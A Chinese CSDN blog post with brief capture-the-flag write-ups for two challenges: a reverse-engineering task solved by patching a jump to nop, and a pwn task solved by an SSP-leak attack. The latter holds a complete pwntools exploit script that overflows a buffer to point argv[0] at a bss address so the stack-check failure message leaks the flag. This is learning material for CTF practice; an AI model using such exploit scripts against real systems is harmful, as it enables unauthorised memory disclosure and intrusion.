jk出发和dasctf的一点wp

已于 2023-04-24 11:29:51 修改
阅读量216 收藏
点赞数
文章标签: c语言 网络安全
于 2023-04-24 11:28:36 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/XDiku/article/details/130338864
版权

0x01 2048(jk出发)

在这里插入图片描述
修改跳转条件为nop,随便动一下直接打印flag。这个场景我幻想过很久了,一直没做到,这次参考wp做出来了知道怎么做了。学到!
在这里插入图片描述

0x02 four(dsactf)

在这里插入图片描述
vmmap查看段权限,可以看到bss段!以前完全不知道可以这样!!

在这里插入图片描述
ssp leak打法,没学过,这次学了。输入argv记一下,然后read开始的地址记一下,拿到偏移,可以打ssp leak,这是最关键的一点。不过高版本修复了。但是没关系,乐趣所在。

__stack_chk_fail中可以看到参数。

from pwn import *

p=process("./pwn")
if args.P:
    p=remote('node4.buuoj.cn',25603)

context.terminal = ['tmux','splitw','-h']
if args.G:
    gdb.attach(p)

p.sendlineafter('your choice :', b'2')
p.sendlineafter('You can give any value, trust me, there will be no overflow', str(0x5FF0-1))
payload = b'N'*(0x5de0) + b'flag\x00'
p.sendlineafter('Actually, this function doesn\'t seem to be useful', payload)
p.sendlineafter('Really?', b'y')

p.sendlineafter('your choice :', b'3')
p.sendlineafter('Enter level:', b'3')
p.sendlineafter('Enter mode:', b'3')
p.sendlineafter('Enter X:', b'3')
p.sendlineafter('Enter a string:', b'3')
p.sendlineafter('please input filename', b'output.txt')
p.sendlineafter('1. yes\n2.no', b'2')

bss = 0x602323
p.sendlineafter('your choice :', b'4')
payload = b':`##>@a*>~3'
p.sendlineafter('info>>', payload)


p.sendline(b'5')
#payload = b'aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaazaaaaaabbaaaaaabcaaaaaabdaaaaaabeaaaaaabfaaaaaabgaaaaaabhaaaaaabiaaaaaabjaaaaaabkaaaaaablaaaaaabmaaaaaabnaaaaaaboaaaaaabpaaaaaab' + p64(bss)
payload = b'YYYYYYYY' + b'N'*0x110+p64(bss)
p.send(payload)

拿到flag。在这里插入图片描述

N1nEmAn
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
JK触发器计算机符号,JK触发器
weixin_30089411的博客
07-25 6486
JK触发器是数字电路触发器中的一种基本电路单元。JK触发器具有置0、置1、保持和翻转功能,在各类集成触发器中,JK触发器的功能最为齐全。在实际应用中,它不仅有很强的通用性,而且能灵活地转换其他类型的触发器。由JK触发器可以构成D触发器和T触发器。中文名JK触发器外文名JK flip-flop功能:置0、置1、保持和翻转基础:主从RS触发器特点:不用考虑一次变化现象JK触发器功能描述编辑语音JK触发...
DASCTF部分复现
qq_63928796的博客
08-08 2267
过滤了大括号 {{,我们可以用 {%print(......)%} 或 {% if ... %}1{% endif %} 的形式来代替,但是题目还过滤了 print 关键字,所以前者用不了了,只能用 {% if ... %}success{% endif %} 的形式来bypass了。因为whatisthis里头的数字,有的很大,我们尝试生成一个小数点长度在10000的圆周率出来,看看能得到什么,圆周率生成的脚本用的是下面这个网址的大佬的脚本。首先利用FTK挂载一下vmdk文件,得到加密的磁盘。...
SpringMVC+easyui显示数据
热门推荐
Huiyang的博客
03-13 75万+
最近做毕业设计,想用easyui,先学习一下CRUD,今天先弄了个表格显示数据库的数据。jsp页面还有很多其它元素,我就不贴上去了。我显示数据的JSP为/WebContent/WEB-INF/views/user/list.jsp 。关键信息如下: <table id="dg" title="My Users" class="easyui-datagrid" style="width:700p
[DASCTF 2023六月挑战赛|二进制专项] 5个pwn
weixin_52640415的博客
06-04 1297
格式化字符串漏洞利用argv链 6次free的off_by_null printf改system
re DASCTF x CBCTF vm_flutter复现
m0_75098930的博客
11-08 148
当时做题的时候用frida hook额,没找对hook的位置,额,找了mainactivity的三个函数尝试了hook,但是呢,没hook出什么有用的信息,打印出的信息,要不就是object,要不就是个函数,有点小崩溃,看了官方wp,才看到了hook的位置,flutter没有函数名有点小难受。这里是一个33位的循环,直接分析一位的操作就行,先push输入,然后push连续的两个值,执行出栈后执行add操作,在与输入进行xor操作,最后store,改一下hook代码。这就能找到所有的密钥。
深入浅出swing程序源代码
09-02
这是关于swing组件如何使用的源代码。简单的介绍各种组建的使用方法。
j和jk是有区别的_JK制服和水手服有什么区别?
weixin_42122340的博客
01-17 2753
展开全部1、JK制服指的是女子高中生制服,种类繁多,e68a843231313335323631343130323136353331333366306533而水手服只是其中一种。JK意为女高中生(じょしこうこうせい),是假名音 jyoshikoukousei的缩写。JK制服意为女子高中生的制服,种类繁多,包括背心裙、夏服、中间服、马甲、西装、大衣、冬服、开衫、毛衣、衬衫,等等。水手服作为校服的一...
j和jk是有区别的_科普向,大家都说jkjk是什么意思呢?
weixin_28951059的博客
01-17 4245
毛衣开衫+长袖水手+百褶裙JK为日语流行语,意为女高中生(じょしこうこうせい)。取假名音jyoshikoukousei中的J和K一、不同的jk制服之间有区别么?毛衣开衫+长袖水手+百褶裙是的,jk制服的种类繁多,jk制服意为女子高中生的制服,细分的话,是有着非常繁多的款目的。包括背心裙,夏服,中间服,马甲,西装,大衣,冬服,开衫,毛衣,衬衫等等。继续下来,单是一个夏服,就有札幌襟,关东襟,关西襟,...
j和jk是有区别的_【JK制服科普贴①】JK入坑,需要注意哪些问题?
weixin_39582724的博客
01-17 2197
JK制服这个词语,可以分为两个部分来看~JK为日语流行语,意为女高中生(じょしこうこうせい)。取假名音 jyoshikoukousei中的J和K,jk制服,顾名思义就是日本女高中生所穿着的制服啦~简单来讲,就是:JK =女子高中生jk制服=女子高中生的制服所以,“穿jk”这类的说法是完全错误的!正常的女孩子不会在身上穿一个人吧23333333JK制服一、关于JK制服的种类:JK制服种类很多,如果仔...
mod_jk.so和apache
11-15
里面包含着apache24版本和相应适合的mod_jk.so,只要解压mod_jk,把里面的mod_jk.so放进apache文件夹的modules文件夹即可。然后再进行代码配置。
主从JK触发器电路结构和状态方程
07-20
主从JK 触发器是在主从RS触发器的基础上组成的,下面一起来看看
jk1.7安装教程和安装包
03-19
JDK 是整个Java的核心,包括了Java运行环境、Java工具和Java基础类库。JDK是学好Java的第一步。而专门运行在x86平台的 Jrocket在服务端运行效率也要比Sun JDK好很多。从SUN的JDK5.0开始,提供了泛型等非常实用的功能...
apache+tomcat+jk 均衡负载和集群
06-07
apache+tomcat+jk 均衡负载和集群 内有详细文档和你所需要的安装文件。 很好很强大!1 很好很强大!1 很好很强大!1 很好很强大!1
[2021东华杯]JK战队WP1
08-03
在分析这个【2021东华杯】JK战队WP1的题目时,我们可以看到它涉及到的是一个Java安全和反序列化漏洞的利用问题。主要的知识点包括: 1. **反序列化**: 反序列化是将之前序列化的对象状态恢复为可操作的对象的过程...
DASCTF&BJDCTF 3rd 部分writeup
weixin_44145820的博客
05-24 3049
目录MiscVm MiscVm addr = 0x203020 ans = [] for i in range(32): tmp = hex(Dword(addr+i*4)) print(tmp) ans.append(tmp[:-1]) print ans
hipcc 编译 amd gpu kernel 和 打包与解包的流程实验
eloudy的专栏
06-17 1232
编译的文件流:.hip kernel --(clang++)--> .o.o --(lld)--> .out.out --(clang-offload-bundler)--> .hipfb代码: 操作过程: 涉及到了三个命令:clang++ -o xxx.olld
趣味C语言——【猜数字】小游戏
欢迎来到 小哇 的博客,会一直加油!
06-16 1520
轻松拿捏C语言!本文综合运用函数、do while循环、switch case语句等来讲解了猜数字游戏,同时详细讲述了随机数的产生和rand、srand、time函数的使用,速来get!
C语言从头学21——函数
最新发布
m0_72128260的博客
06-17 957
函数是一段可以重复执行的代码。这个定义比较抽象,实际上就是我们常说的子程序。函数的来源有两大块,一是C语言为我们提供的大量函数,如 printf(),它们被声明在各种头文件、库文件中,使用前我们使用 #include 命令把相应的文件包含到我们的程序中就可以使用;另一块是我们自己编写 (自定义) 的函数,本文重点学习这一块内容。
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8296
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
jk触发器和主从jk触发器的区别
06-06
主从JK触发器与普通JK触发器的区别在于其输入和输出。主从JK触发器有两个时钟输入,一个称为主时钟,另一个称为从时钟。主时钟控制整个主从JK触发器的工作,而从时钟只控制从触发器的工作。这样,在主时钟的上升沿时...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值